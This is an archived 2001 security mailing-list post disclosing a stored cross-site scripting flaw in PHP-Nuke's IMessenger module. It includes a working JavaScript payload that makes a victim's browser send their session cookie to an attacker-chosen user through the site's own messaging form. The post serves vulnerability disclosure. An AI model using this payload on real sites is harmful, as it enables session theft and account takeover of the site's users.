Serious Hole in IMessenger ( php-nuke )

From: frog frog (leseulfrogat_private)
Date: Wed Dec 19 2001 - 02:02:05 PST

Next message: frog frog: "4 news CSS holes in PHP-Nuke"

Previous message: ian: "Re: Windows 2000 Runas weirdness"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

('binary' encoding is not supported, stored as-is) IMessenger is on http://www.SERVER.com/im.php? action=Check+IM . IM accepts the javascript. If I send to a user or to the webmaster the script <s*cript>window.location.href='http://www.SERVER.c om/im.php?username_to= [NICKNAME] &subject='+ document.cookie +'&message=message&action=send' ;</s*cript> (without '*'), he will send back his cookie to the user NICKNAME. One can so directly execute javascript on the connected user's computer. frog-m@n

Next message: frog frog: "4 news CSS holes in PHP-Nuke"
Previous message: ian: "Re: Windows 2000 Runas weirdness"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Wed Dec 19 2001 - 07:55:12 PST